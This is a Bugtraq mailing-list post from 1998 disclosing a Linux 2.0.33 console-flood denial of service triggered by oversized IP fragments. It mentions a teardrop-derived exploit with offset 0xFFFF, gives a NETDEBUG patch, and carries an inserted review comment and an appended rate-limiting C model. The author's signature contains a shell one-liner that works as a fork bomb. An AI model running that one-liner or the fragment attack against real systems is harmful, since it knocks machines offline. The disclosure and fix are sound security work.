Bugtraq mailing list archives

Linux 2.0.33 vulnerability: oversized packets


From: lcamtuf () BOSS STASZIC WAW PL (Michal Zalewski)
Date: Fri, 17 Apr 1998 17:21:25 +0200



I'm not sure if it's known, but I haven't found anything about it.
No matter, there's something strange in net/ipv4/ip_fragment.h (it's
probably Alan's fault):

[ in function ip_glue ]

if(len>65535)
{
        printk("Oversized IP packet from %s.\n", in_ntoa(qp->iph->saddr));
        ip_statistics.IpReasmFails++;
        ip_free(qp);
        return NULL;
}

Right, printk with no NETDEBUG nor anything else. So, there's a potential
DoS attack - I wrote a simple exploit by modifying the teardrop source (mainly,
fragmentation offset of second packet = 0xFFFF), and it's quite nasty (see
attachment).

Fix:

--- ip_fragment.c.orig  Fri Apr 17 16:42:38 1998
+++ ip_fragment.c       Fri Apr 17 17:17:15 1998
@@ -345,7 +345,7 @@

        if(len>65535)
        {
-               printk("Oversized IP packet from %s.\n", in_ntoa(qp->iph->saddr));
+               NETDEBUG(printk("Oversized IP packet from %s.\n", in_ntoa(qp->iph->saddr)));
                ip_statistics.IpReasmFails++;
                ip_free(qp);
                return NULL;
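Review bot: wrapping the printk in NETDEBUG() makes the message vanish entirely in non-debug builds, so after this hunk an oversized-fragment flood leaves no trace except the ip_statistics.IpReasmFails increment two lines below; operators lose the source address that in_ntoa(qp->iph->saddr) was reporting. A rate-limited log (keep the printk, but only emit it a bounded number of times per interval) would close the console-flood DoS while keeping the event observable. The rest of the hunk is right: the counter increment, ip_free(qp) and return NULL are unchanged, so the oversized datagram is still dropped.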


_______________________________________________________________________
Michal Zalewski [lcamtuf () boss staszic waw pl] <= finger for pub PGP key
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]
[echo "\$0&\$0">_;chmod +x _;./_] <=------=> [tel +48 (0) 22 813 25 86]
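As an added illustration (not code from the post, the attached exploit, or the Linux kernel), the following user-space model reproduces the shape of the ip_glue() length check quoted above and replaces the unconditional log call with a simple token-bucket limiter, which is the mitigation an operator would want instead of silencing the message outright. All names (ratelimit, ip_stats, check_reassembled_len, simulate_flood) and the 10.0.0.1 source address are constructed for this example; the limiter is a stand-in for the kernel's later printk_ratelimit() behaviour, not a copy of it.

```c
#include <stdio.h>
#include <stdint.h>
#include <stdbool.h>

/* Hypothetical user-space model of the reassembly length check from the
 * post. Everything here is constructed for illustration; it is not kernel
 * code. */

#define IP_MAXPACKET 65535UL   /* largest IPv4 datagram: 16-bit total length */

/* Token-bucket style limiter: at most `burst` log lines per `interval_ms`. */
struct ratelimit {
    unsigned long interval_ms;
    unsigned int  burst;
    unsigned long window_start_ms;  /* start of the current window */
    unsigned int  printed;          /* lines emitted in the current window */
    unsigned long suppressed;       /* lines dropped by the limiter, total */
};

/* Returns true if a log line may be emitted now, false if it is suppressed. */
bool ratelimit_allow(struct ratelimit *rl, unsigned long now_ms)
{
    if (now_ms - rl->window_start_ms >= rl->interval_ms) {
        rl->window_start_ms = now_ms;   /* new window: reset the budget */
        rl->printed = 0;
    }
    if (rl->printed < rl->burst) {
        rl->printed++;
        return true;
    }
    rl->suppressed++;
    return false;
}

/* Counters mirroring ip_statistics.IpReasmFails plus a log-line counter. */
struct ip_stats {
    unsigned long reasm_fails;
    unsigned long log_lines;
};

/* Model of the fixed check: the datagram is always dropped and the failure
 * counter always incremented, but the log line is gated by the limiter so a
 * flood of oversized fragments cannot flood the console.
 * Returns true if the reassembled datagram was rejected as oversized. */
bool check_reassembled_len(unsigned long len, uint32_t saddr,
                           struct ratelimit *rl, struct ip_stats *st,
                           unsigned long now_ms)
{
    if (len > IP_MAXPACKET) {
        if (ratelimit_allow(rl, now_ms)) {
            st->log_lines++;
            printf("Oversized IP packet from %u.%u.%u.%u (len=%lu).\n",
                   saddr >> 24, (saddr >> 16) & 0xffu,
                   (saddr >> 8) & 0xffu, saddr & 0xffu, len);
        }
        st->reasm_fails++;
        return true;   /* caller frees the queue, as ip_free(qp) does */
    }
    return false;
}

/* Simulate n_packets oversized datagrams arriving one per millisecond from a
 * constructed source (10.0.0.1). Returns how many log lines were suppressed. */
unsigned long simulate_flood(unsigned long n_packets, struct ip_stats *st)
{
    struct ratelimit rl = { .interval_ms = 1000, .burst = 5 };
    const uint32_t saddr = 0x0a000001u;   /* 10.0.0.1, constructed */
    for (unsigned long i = 0; i < n_packets; i++)
        check_reassembled_len(IP_MAXPACKET + 1 + i, saddr, &rl, st, i);
    return rl.suppressed;
}

int main(void)
{
    struct ip_stats st = { 0, 0 };
    unsigned long suppressed = simulate_flood(1000, &st);
    printf("dropped=%lu logged=%lu suppressed=%lu\n",
           st.reasm_fails, st.log_lines, suppressed);
    return 0;
}
```

Running the model with 1000 oversized datagrams in one second drops all 1000 and bumps the failure counter each time, but only five lines reach the log; the remaining 995 are counted as suppressed, so the event stays visible without the per-packet console cost the post describes.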
